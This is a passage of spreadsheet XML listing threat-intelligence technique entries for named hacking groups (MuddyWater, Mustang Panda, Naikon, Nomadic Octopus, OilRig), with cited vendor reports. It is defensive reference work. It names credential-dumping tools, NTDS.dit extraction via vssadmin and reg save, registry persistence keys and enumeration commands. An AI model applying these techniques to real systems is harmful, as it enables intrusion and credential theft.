    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used CMSTP.exe and a malicious INF to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used the .NET csc.exe tool to compile executables from downloaded C# code.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has run a tool that steals passwords saved in victim email.(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [LaZagne](https://attack.mitre.org/software/S0349) and other tools, including by dumping passwords saved in victim email.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has run tools including Browser64 to steal passwords saved in victim web browsers.(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) decoded base64-encoded PowerShell commands using a VBS file.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) can disable the system's local proxy settings.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used &lt;code&gt;cmd.exe net user /domain&lt;/code&gt; to enumerate domain users.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can execute PowerShell scripts via DDE.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[MuddyWater](https://attack.mitre.org/groups/G0069) has specifically targeted government agency employees with spearphishing e-mails.(Citation: Anomali Static Kitten February 2021)	 </t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used C2 infrastructure to receive exfiltrated data.(Citation: Reaqta MuddyWater November 2017)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Office vulnerability CVE-2017-0199 for execution.(Citation: ClearSky MuddyWater June 2019)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has controlled [POWERSTATS](https://attack.mitre.org/software/S0223) from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can upload additional files to the victim’s machine.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used JavaScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: ClearSky MuddyWater Nov 2018)(Citation: FireEye MuddyWater Mar 2018)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [Mimikatz](https://attack.mitre.org/software/S0002) and procdump64.exe.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has stored a decoy PDF file within a victim's `%temp%` folder.(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[MuddyWater](https://attack.mitre.org/groups/G0069) has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)	 </t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has distributed URLs in phishing e-mails that link to lure documents.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.(Citation: FireEye MuddyWater Mar 2018)(Citation: Talos MuddyWater May 2019)(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used mshta.exe to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload and to pass a PowerShell one-liner for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[MuddyWater](https://attack.mitre.org/groups/G0069) has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.(Citation: Talos MuddyWater May 2019) </t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a Word Template, Normal.dotm, for persistence.(Citation: Reaqta MuddyWater November 2017)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to obtain a list of running processes on the system.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used developed tools in Python including [Out1](https://attack.mitre.org/software/S0594).(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has added Registry Run key &lt;code&gt;KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding&lt;/code&gt; to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[MuddyWater](https://attack.mitre.org/groups/G0069) has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.(Citation: Trend Micro Muddy Water March 2021)(Citation: Anomali Static Kitten February 2021) </t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used scheduled tasks to establish persistence.(Citation: Reaqta MuddyWater November 2017)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can capture screenshots of the victim’s machine.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a PowerShell backdoor to check for Skype connectivity on the target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)	(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has sent targeted spearphishing e-mails with malicious links.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used tools to encode C2 communications including Base64 encoding.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has stored obfuscated JavaScript code in an image file named temp.jpg.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used AES to encrypt C2 responses.(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim’s OS version and machine name.(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to collect the victim’s IP address and domain name.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a PowerShell backdoor to check for Skype connections on the target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim’s username.(Citation: Securelist MuddyWater Oct 2018)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>MuddyWater has made use of legitimate tools ConnectWise and Remote Utilities to gain access to target environment.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used VBScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used file sharing services including OneHub to distribute tools.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that leveraged WMI for execution and querying host information.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has encrypted documents with RC4 prior to exfiltration.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used RAR to create password-protected archives of collected documents prior to exfiltration.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) used custom batch scripts to collect files automatically from a targeted system.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used junk code within their DLL files to hinder analysis.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a legitimately signed executable to execute a malicious payload within a DLL file.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) have acquired C2 domains prior to operations.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used an additional filename extension to hide the true file type.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a customized [PlugX](https://attack.mitre.org/software/S0013) variant which could exfiltrate documents from air-gapped networks.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has exploited CVE-2017-0199 in Microsoft Word to execute code.(Citation: Crowdstrike MUSTANG PANDA June 2018)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) will delete their tools and files, and kill processes after their objectives are reached.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129)'s [PlugX](https://attack.mitre.org/software/S0013) variant has created a hidden folder on USB drives named &lt;code&gt;RECYCLE.BIN&lt;/code&gt; to store malicious executables and collected data.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has downloaded additional executables following the initial infection stage.(Citation: Recorded Future REDDELTA July 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;InstallUtil.exe&lt;/code&gt; to execute a malicious Beacon stager.(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has stored collected credential files in &lt;code&gt;c:\windows\temp&lt;/code&gt; prior to exfiltration. [Mustang Panda](https://attack.mitre.org/groups/G0129) has also stored documents for exfiltration in a hidden folder on USB drives.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has sent malicious files requiring direct victim interaction to execute.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Avira Mustang Panda January 2020)(Citation: Recorded Future REDDELTA July 2020)(Citation: Google TAG Ukraine Threat Landscape March 2022)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has sent malicious links including links directing victims to a Google Drive folder.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: McAfee Dianxun March 2021)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise [PlugX](https://attack.mitre.org/software/S0013), and a file named `OneDrive.exe` to load a [Cobalt Strike](https://attack.mitre.org/software/S0154) payload.(Citation: Recorded Future REDDELTA July 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used mshta.exe to launch collection scripts.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. [Mustang Panda](https://attack.mitre.org/groups/G0129) has also used &lt;code&gt;reg save&lt;/code&gt; on the SYSTEM file Registry location to help extract the NTDS.dit file.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has delivered initial payloads hidden using archives and encoding measures.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used malicious PowerShell scripts to enable execution.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;tasklist /v&lt;/code&gt; to determine active process information.(Citation: Avira Mustang Panda January 2020)	</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has created the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU&lt;/code&gt; to maintain persistence.(Citation: Proofpoint TA416 November 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has installed TeamViewer on targeted systems.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a customized [PlugX](https://attack.mitre.org/software/S0013) variant which could spread through USB connections.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has created a scheduled task to execute additional malicious software, as well as maintain persistence.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: McAfee Dianxun March 2021)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has searched the victim system for the &lt;code&gt;InstallUtil.exe&lt;/code&gt; program and its version.(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used spearphishing attachments to deliver initial access payloads.(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has delivered web bugs and malicious links to their intended targets.(Citation: McAfee Dianxun March 2021)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used servers under their control to validate tracking pixels sent to phishing victims.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has encrypted C2 communications with RC4.(Citation: Recorded Future REDDELTA July 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has gathered system information using &lt;code&gt;systeminfo&lt;/code&gt;.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;ipconfig&lt;/code&gt; and &lt;code&gt;arp&lt;/code&gt; to determine network configuration information.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;netstat -ano&lt;/code&gt; to determine network connection information.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has hosted malicious payloads on DropBox including [PlugX](https://attack.mitre.org/software/S0013).(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has embedded VBScript components in LNK files to download additional files and automate collection.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has communicated with its C2 via HTTP POST requests.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used DropBox URLs to deliver variants of [PlugX](https://attack.mitre.org/software/S0013).(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has executed HTA files via cmd.exe, and used batch scripts for collection.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has executed PowerShell scripts via WMI.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129)'s custom ORat tool uses a WMI event consumer to maintain persistence.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used DLL side-loading to load malicious DLL's into legitimate executables.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used administrator credentials for lateral movement in compromised networks.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has convinced victims to open malicious attachments to execute malware.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) renamed a malicious service &lt;code&gt;taskmgr&lt;/code&gt; to appear to be a legitimate version of Task Manager.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has disguised malicious programs as Google Chrome, Adobe, and VMware executables.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used the LadonGo scanner to scan target networks.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has modified a victim's Windows Run registry to establish persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used a netbios scanner for remote machine identification.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used schtasks.exe for lateral movement in compromised networks.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) uses commands such as &lt;code&gt;netsh advfirewall firewall&lt;/code&gt; to discover local firewall settings.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used malicious e-mail attachments to deliver malware.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) uses commands such as &lt;code&gt;netsh interface show&lt;/code&gt; to discover network interface settings.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used WMIC.exe for lateral movement.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Nomadic Octopus](https://attack.mitre.org/groups/G0133) executed PowerShell in a hidden window.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has used malicious macros to download additional files to the victim's machine.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) as attempted to lure victims into clicking on malicious attachments within spearphishing emails.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) attempted to make [Octopus](https://attack.mitre.org/software/S0340) appear as a  Telegram Messenger with a Russian interface.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has used PowerShell for execution.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has targeted victims with spearphishing emails containing malicious attachments.(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) used &lt;code&gt;cmd.exe /c&lt;/code&gt; within a malicious macro.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) used the Plink utility and other tools to create tunnels to C2 servers.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used automated collection.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used brute force techniques to obtain credentials.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [LaZagne](https://attack.mitre.org/software/S0349) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used various types of scripting for execution.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig ISMAgent July 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Nov 2018)</t>
  </si>
  <si>
